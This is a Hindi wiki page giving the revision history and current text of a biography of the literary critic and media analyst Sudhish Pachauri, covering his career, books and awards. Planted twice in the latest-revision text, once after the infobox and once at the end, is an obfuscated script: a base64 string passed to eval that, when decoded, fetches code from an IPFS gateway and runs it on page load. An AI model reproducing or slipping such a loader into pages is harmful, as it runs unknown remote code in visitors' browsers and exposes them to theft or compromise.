Difference between revisions of "सुधीश पचौरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('सुधीश पचौरी का जन्म 29 दिसम्बर, 1955 को उत्तर प्रदेश के [...' के साथ नया पन्ना बनाया)
 
 
(14 intermediate revisions by 7 users not shown)
Line 1: Line 1:
सुधीश पचौरी का जन्म 29 दिसम्बर, 1955 को [[उत्तर प्रदेश]] के [[अलीगढ़]] में हुआ था। सुधीश पचौरी प्रसिद्ध आलोचक एवं प्रमुख मीडिया विश्लेषक हैं। साहित्यकार, स्तंभकार और वरिष्ठ मीडिया समीक्षक, सुधीश पचौरी को 2010 में ‘हिंदी सलाहकार समिति’ का सदस्य बनाया गया है। [[दिल्ली विश्वविद्यालय]] में [[हिंदी]] के प्राध्यापक, पचौरी को दिल्ली विश्वविद्यालय में '''डीन ऑफ कॉलेज''' भी बनाया गया है। दैनिक हिंदी अखबार, ‘जनसत्ता’ में पचौरी का एक कॉलम ‘देखी-सुनी’ पिछले 25 वर्षों से भी अधिक समय से लागातार आ रहा है, जो अपने आप में एक बहुत बड़ी उपलब्धि है। यह कॉलम वर्ष 1984 से लागातार आ रहा है और यह 26वें वर्ष में प्रवेश कर गया है। पचौरी को साहित्य जगत में योगदान के लिए कई पुरस्कार भी मिल चुके हैं।<ref>{{cite web |url=http://www.samachar4media.com/news-story/sudish-pachouri-hindi-committe |title=वरिष्ठ मीडिया समीक्षक, सुधीश पचौरी ‘हिंदी सलाहकार समिति’ के सदस्य बनें|accessmonthday=2 अक्टूबर|accessyear=2011|last= |first= |authorlink= |format= |publisher= |language=हिंदी}}</ref>  
+
{{सूचना बक्सा साहित्यकार
 +
|चित्र=Sudhish pachauri.jpg
 +
|पूरा नाम=डॉ. सुधीश पचौरी
 +
|अन्य नाम=
 +
|जन्म=[[29 दिसम्बर]], 1948
 +
|जन्म भूमि=[[अलीगढ़]], [[उत्तर प्रदेश]]
 +
|अभिभावक=
 +
|पति/पत्नी=
 +
|संतान=
 +
|कर्म भूमि=
 +
|कर्म-क्षेत्र=आलोचक, मीडिया विश्लेषक, साहित्यकार, स्तंभकार
 +
|मृत्यु=
 +
|मृत्यु स्थान=
 +
|मुख्य रचनाएँ=नई कविता का वैचारिक आधार, कविता का अंत, दूरदर्शन की भूमिका, दूरदर्शन : स्वायत्तता और स्वतंत्रता, उत्तर आधुनिकता और उत्तरसंचरनावाद, उत्तर आधुनिक परिदृश्य, नवसाम्राज्यवाद और संस्कृति, दूरदर्शन : दशा और दिशा, नामवर के विमर्श, दूरदर्शन : विकास से बाज़ार तक, जनसंचार माध्यम, भाषा और साहित्य, निर्मल वर्मा और उत्तर-उपनिवेशवाद
 +
|विषय=प्रौढ़ एवं नवसाक्षर साहित्य, समीक्षा, अनुवाद
 +
|भाषा=[[हिन्दी भाषा]]
 +
|विद्यालय=
 +
|शिक्षा=एम.ए., पी-एच.डी. (हिन्दी)
 +
|पुरस्कार-उपाधि=रामचन्द्र शुक्ल सम्मान, भारतेन्दु हरिश्चन्द्र पुरस्कार, साहित्यकार  सम्मान
 +
|प्रसिद्धि=आलोचक, मीडिया विश्लेषक
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=सदस्य-हिंदी सलाहकार समिति
 +
|पाठ 1=डीन ऑफ कॉलेज, [[दिल्ली विश्वविद्यालय]]
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=11:24, 5 अक्टूबर 2011 (IST)
 +
}}
 +
'''सुधीश पचौरी''' ([[अंग्रेज़ी]]: ''Sudhish Pachauri'', जन्म: [[29 दिसम्बर]], [[1948]] [[अलीगढ़]]) प्रसिद्ध आलोचक एवं प्रमुख मीडिया विश्लेषक हैं। साहित्यकार, स्तंभकार और वरिष्ठ मीडिया समीक्षक, सुधीश पचौरी को 2010 में ‘हिंदी सलाहकार समिति’ का सदस्य बनाया गया। [[दिल्ली विश्वविद्यालय]] में [[हिंदी]] के प्राध्यापक, पचौरी को दिल्ली विश्वविद्यालय में 'डीन ऑफ कॉलेज' भी बनाया गया है। दैनिक हिंदी अखबार, ‘जनसत्ता’ में पचौरी का एक कॉलम ‘देखी-सुनी’ पिछले 25 वर्षों से भी अधिक समय से लगातार आ रहा है, जो अपने आप में एक बहुत बड़ी उपलब्धि है। यह कॉलम वर्ष 1984 से लगातार आ रहा है और यह 26वें [[वर्ष]] में प्रवेश कर गया है। पचौरी को साहित्य जगत में योगदान के लिए कई पुरस्कार भी मिल चुके हैं।<ref>{{cite web |url=http://www.samachar4media.com/news-story/sudish-pachouri-hindi-committe |title=वरिष्ठ मीडिया समीक्षक, सुधीश पचौरी ‘हिंदी सलाहकार समिति’ के सदस्य बनें|accessmonthday=2 अक्टूबर|accessyear=2011|last= |first= |authorlink= |format= |publisher= |language=हिंदी}}</ref>  
 
==शिक्षा==
 
==शिक्षा==
आपने एम.ए. हिन्दी और पी.एच.डी. दिल्ली विश्वविद्यालय से कर रखी है।
+
आपने एम.ए. [[हिन्दी]] और पी.एच.डी. [[दिल्ली विश्वविद्यालय]] से कर रखी है।
 
==कार्यक्षेत्र==
 
==कार्यक्षेत्र==
[[हिंदी]] के प्रचार और प्रसार के लिए 1967 में ‘केन्‍द्रीय हिंदी समिति’ का गठन किया गया था जिसके पदेन अध्यक्ष, प्रधानमंत्री होते हैं। ‘केंद्रीय हिंदी समिति’ के दिशा-निर्देशन में विभिन्न मंत्रालयों और विभागों में भी ‘हिंदी सलाहकार समितियों’ का गठन किया जाता है जिसकी अध्यक्षता संबंधित विभाग के मंत्री करते हैं। सुधीश पचौरी को [[दिल्ली विश्वविद्यालय]] में 'कॉलेज ऑफ डीन' भी बनाया गया है। इस नियुक्ति के साथ ही, पचौरी [[विश्वविद्यालय]] के इतिहास में, पहले ऐसे व्यक्ति बन गए हैं, जो हिंदी विभाग से इस पद पर पहुंचे है।  
+
[[हिंदी]] के प्रचार और प्रसार के लिए 1967 में ‘केन्‍द्रीय हिंदी समिति’ का गठन किया गया था जिसके पदेन अध्यक्ष, [[प्रधानमंत्री]] होते हैं। ‘केंद्रीय हिंदी समिति’ के दिशा-निर्देशन में विभिन्न मंत्रालयों और विभागों में भी ‘हिंदी सलाहकार समितियों’ का गठन किया जाता है जिसकी अध्यक्षता संबंधित विभाग के मंत्री करते हैं। सुधीश पचौरी को [[दिल्ली विश्वविद्यालय]] में 'कॉलेज ऑफ डीन' भी बनाया गया है। इस नियुक्ति के साथ ही, पचौरी [[विश्वविद्यालय]] के इतिहास में, पहले ऐसे व्यक्ति बन गए हैं, जो हिंदी विभाग से इस पद पर पहुंचे है।  
 
==रचनाएँ==
 
==रचनाएँ==
सुधीश पचौरी विभिन्न विषयों पर, पचास से भी अधिक किताबें लिख चुके हैं। मीडिया से जुड़ी उनके कुछ प्रमुख किताबें हैं- ‘मीडिया और साहित्य’, ‘मीडिया की परख’, ‘टीवी टाइम्स’ आदि।<ref>{{cite web |url=http://www.samachar4media.com/news-story/sudish-pachouri-hindi-committe |title= |accessmonthday=2 अक्टूबर|accessyear=2011|last= |first= |authorlink= |format= |publisher= |language=हिंदी}}</ref>  
+
{{tocright}}
Pasted from <http://www.samachar4media.com/news-story/sudish-pachouri-hindi-committe>
+
सुधीश पचौरी विभिन्न विषयों पर, पचास से भी अधिक किताबें लिख चुके हैं। मीडिया से जुड़ी उनके कुछ प्रमुख किताबें हैं- ‘मीडिया और साहित्य’, ‘मीडिया की परख’, ‘टीवी टाइम्स’ आदि।<ref>{{cite web |url=http://www.samachar4media.com/news-story/sudish-pachouri-hindi-committe |title=वरिष्ठ मीडिया समीक्षक, सुधीश पचौरी ‘हिंदी सलाहकार समिति’ के सदस्य बनें|accessmonthday=2 अक्टूबर|accessyear=2011|last= |first= |authorlink= |format= |publisher= |language=हिंदी}}</ref> इनकी प्रमुख किताबों में 'कविता का अंत', 'दूरदर्शन की भूमिका',  'दूरदर्शन : स्वायत्तता और स्वतंत्रता', 'विकास से बाज़ार तक', 'मीडिया और साहित्य', 'टीवी टाइम्स', 'साहित्य का उत्तरकाण्ड', 'स्त्री देह के विमर्श', 'आलोचना से आगे', मीडिया, जनतन्त्र और आतंकवाद, मीडिया की परख आदि शामिल हैं।<ref>{{cite web |url=http://bhadas4media.com/vividh/7929-2010-12-16-10-51-19.html |title=सुधीश पचौरी बने हिंदी सलाहकार समिति के सदस्‍य|accessmonthday=2 अक्टूबर|accessyear=2011|last= |first= |authorlink= |format= |publisher= |language=हिंदी}}</ref>  
इनकी प्रमुख किताबों में 'कविता का अंत', 'दूरदर्शन की भूमिका',  'दूरदर्शन : स्वायत्तता और स्वतंत्रता', 'विकास से बाजार तक', 'मीडिया और साहित्य', 'टीवी टाइम्स', 'साहित्य का उत्तरकाण्ड', 'स्त्री देह के विमर्श', 'आलोचना से आगे', मीडिया, जनतन्त्र और आतंकवाद, मीडिया की परख आदि शामिल हैं।<ref>{{cite web |url=http://bhadas4media.com/vividh/7929-2010-12-16-10-51-19.html |title=सुधीश पचौरी बने हिंदी सलाहकार समिति के सदस्‍य|accessmonthday=2 अक्टूबर|accessyear=2011|last= |first= |authorlink= |format= |publisher= |language=हिंदी}}</ref>  
 
 
;प्रकाशित कृतियाँ   
 
;प्रकाशित कृतियाँ   
 
*नई कविता का वैचारिक आधार,  
 
*नई कविता का वैचारिक आधार,  
Line 18: Line 48:
 
*दूरदर्शन : दशा और दिशा,  
 
*दूरदर्शन : दशा और दिशा,  
 
*नामवर के विमर्श,  
 
*नामवर के विमर्श,  
*दूरदर्शन : विकास से बाजार तक,  
+
*दूरदर्शन : विकास से बाज़ार तक,  
 
*उत्तर आधुनिक साहित्यिक विमर्श,  
 
*उत्तर आधुनिक साहित्यिक विमर्श,  
 
*मीडिया और साहित्य,  
 
*मीडिया और साहित्य,  
 
*उत्तर केदार,  
 
*उत्तर केदार,  
 
*देरिदा का विखंडन और साहित्य,  
 
*देरिदा का विखंडन और साहित्य,  
*साहित्य का उत्तरकांड : कला का बाजार,  
+
*साहित्य का उत्तरकांड : कला का बाज़ार,  
 
*टीवी टाइम्स,  
 
*टीवी टाइम्स,  
 
*इक्कीसवीं सदी का पूर्वरंग,  
 
*इक्कीसवीं सदी का पूर्वरंग,  
Line 40: Line 70:
  
 
==पुरस्कार==  
 
==पुरस्कार==  
इन्‍हें 'मध्यप्रदेश साहित्य परिषद' का '''रामचन्द्र शुक्ल सम्मान''', '''भारतेन्दु हरिश्चन्द्र पुरस्कार''' एवं दिल्ली हिंदी अकादमी द्वारा '''साहित्यकार सम्मान''' भी मिल चुका है।
+
इन्‍हें 'मध्यप्रदेश साहित्य परिषद' का '''रामचन्द्र शुक्ल सम्मान''', '''भारतेन्दु हरिश्चन्द्र पुरस्कार''' एवं दिल्ली हिंदी अकादमी द्वारा '''साहित्यकार सम्मान''' भी मिल चुका है।
  
 
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
*[http://jantantra.com/2010/05/19/interaction-on-media-and-literature-by-mohalla-live-janatantra-and-yatra-books/  लेखक बेहतर राष्‍ट्रीय प्रवक्‍ता हो सकते हैं, पर वे सुस्‍त हैं]  
 
*[http://jantantra.com/2010/05/19/interaction-on-media-and-literature-by-mohalla-live-janatantra-and-yatra-books/  लेखक बेहतर राष्‍ट्रीय प्रवक्‍ता हो सकते हैं, पर वे सुस्‍त हैं]  
 
*[http://www.hunkaar.com/2010/01/blog-post_4052.html सुधीश पचौरी के बयान से मची खलबली]  
 
*[http://www.hunkaar.com/2010/01/blog-post_4052.html सुधीश पचौरी के बयान से मची खलबली]  
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{पत्रकार}}{{साहित्यकार}}{{आलोचक एवं समीक्षक}}
[[Category:नया पन्ना अक्टूबर-2011]]
+
[[Category:आधुनिक साहित्य]][[Category:चरित कोश]][[Category:समकालीन साहित्य]][[Category:समाचार जगत]][[Category:साहित्य कोश]][[Category:साहित्यकार]]
 
+
[[Category:हिन्दी के स्तंभकार]]
 +
[[Category:आलोचक]]
 
__INDEX__
 
__INDEX__
[[Category:आधुनिक_साहित्य]][[Category:चरित_कोश]][[Category:समकालीन_साहित्य]][[Category:समाचार_जगत]][[Category:साहित्य_कोश]][[Category:साहित्यकार]]
 

Latest revision as of 06:49, 29 December 2017

sudhish pachauri
poora nam d aau. sudhish pachauri
janm 29 disambar, 1948
janm bhoomi aligadh, uttar pradesh
karm-kshetr alochak, midiya vishleshak, sahityakar, stanbhakar
mukhy rachanaean nee kavita ka vaicharik adhar, kavita ka aant, dooradarshan ki bhoomika, dooradarshan : svayattata aur svatantrata, uttar adhunikata aur uttarasancharanavad, uttar adhunik paridrishy, navasamrajyavad aur sanskriti, dooradarshan : dasha aur disha, namavar ke vimarsh, dooradarshan : vikas se bazar tak, janasanchar madhyam, bhasha aur sahity, nirmal varma aur uttar-upaniveshavad
vishay praudh evan navasakshar sahity, samiksha, anuvad
bhasha hindi bhasha
shiksha em.e., pi-ech.di. (hindi)
puraskar-upadhi ramachandr shukl samman, bharatendu harishchandr puraskar, sahityakar samman
prasiddhi alochak, midiya vishleshak
nagarikata bharatiy
sadasy-hiandi salahakar samiti din aauph k aaulej, dilli vishvavidyalay
adyatan‎ 11:24, 5 aktoobar 2011 (IST)
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sudhish pachauri (aangrezi: Sudhish Pachauri, janm: 29 disambar, 1948 aligadh) prasiddh alochak evan pramukh midiya vishleshak haian. sahityakar, stanbhakar aur varishth midiya samikshak, sudhish pachauri ko 2010 mean ‘hiandi salahakar samiti’ ka sadasy banaya gaya. dilli vishvavidyalay mean hiandi ke pradhyapak, pachauri ko dilli vishvavidyalay mean 'din aauph k aaulej' bhi banaya gaya hai. dainik hiandi akhabar, ‘janasatta’ mean pachauri ka ek k aaulam ‘dekhi-suni’ pichhale 25 varshoan se bhi adhik samay se lagatar a raha hai, jo apane ap mean ek bahut b di upalabdhi hai. yah k aaulam varsh 1984 se lagatar a raha hai aur yah 26vean varsh mean pravesh kar gaya hai. pachauri ko sahity jagat mean yogadan ke lie kee puraskar bhi mil chuke haian.[1]

shiksha

apane em.e. hindi aur pi.ech.di. dilli vishvavidyalay se kar rakhi hai.

karyakshetr

hiandi ke prachar aur prasar ke lie 1967 mean ‘kenh‍driy hiandi samiti’ ka gathan kiya gaya tha jisake paden adhyaksh, pradhanamantri hote haian. ‘keandriy hiandi samiti’ ke disha-nirdeshan mean vibhinn mantralayoan aur vibhagoan mean bhi ‘hiandi salahakar samitiyoan’ ka gathan kiya jata hai jisaki adhyakshata sanbandhit vibhag ke mantri karate haian. sudhish pachauri ko dilli vishvavidyalay mean 'k aaulej aauph din' bhi banaya gaya hai. is niyukti ke sath hi, pachauri vishvavidyalay ke itihas mean, pahale aise vyakti ban ge haian, jo hiandi vibhag se is pad par pahuanche hai.

rachanaean

sudhish pachauri vibhinn vishayoan par, pachas se bhi adhik kitabean likh chuke haian. midiya se ju di unake kuchh pramukh kitabean haian- ‘midiya aur sahity’, ‘midiya ki parakh’, ‘tivi taims’ adi.[2] inaki pramukh kitaboan mean 'kavita ka aant', 'dooradarshan ki bhoomika', 'dooradarshan : svayattata aur svatantrata', 'vikas se bazar tak', 'midiya aur sahity', 'tivi taims', 'sahity ka uttarakand', 'stri deh ke vimarsh', 'alochana se age', midiya, janatantr aur atankavad, midiya ki parakh adi shamil haian.[3]

prakashit kritiyaan
  • nee kavita ka vaicharik adhar,
  • kavita ka aant,
  • dooradarshan ki bhoomika,
  • dooradarshan : svayattata aur svatantrata,
  • uttar adhunikata aur uttarasancharanavad,
  • uttar adhunik paridrishy,
  • navasamrajyavad aur sanskriti,
  • dooradarshan : dasha aur disha,
  • namavar ke vimarsh,
  • dooradarshan : vikas se bazar tak,
  • uttar adhunik sahityik vimarsh,
  • midiya aur sahity,
  • uttar kedar,
  • derida ka vikhandan aur sahity,
  • sahity ka uttarakaand : kala ka bazar,
  • tivi taims,
  • ikkisavian sadi ka poorvarang,
  • ashok vajapeyi : path kupath,
  • prasar bharati aur prasaran-paridrishy,
  • saibar-spes aur midiya,
  • stri deh ke vimarsh,
  • alochana se age,
  • hinduttav aur uttar adhunikata,
  • midiya janatantr aur atankavad,
  • vibhakti aur vikhandan,
  • ne janasanchar madhyam aur hindi,
  • janasanchar madhyam,
  • bhasha aur sahity,
  • nirmal varma aur uttar-upaniveshavad

puraskar

inh‍hean 'madhyapradesh sahity parishad' ka ramachandr shukl samman, bharatendu harishchandr puraskar evan dilli hiandi akadami dvara sahityakar samman bhi mil chuka hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>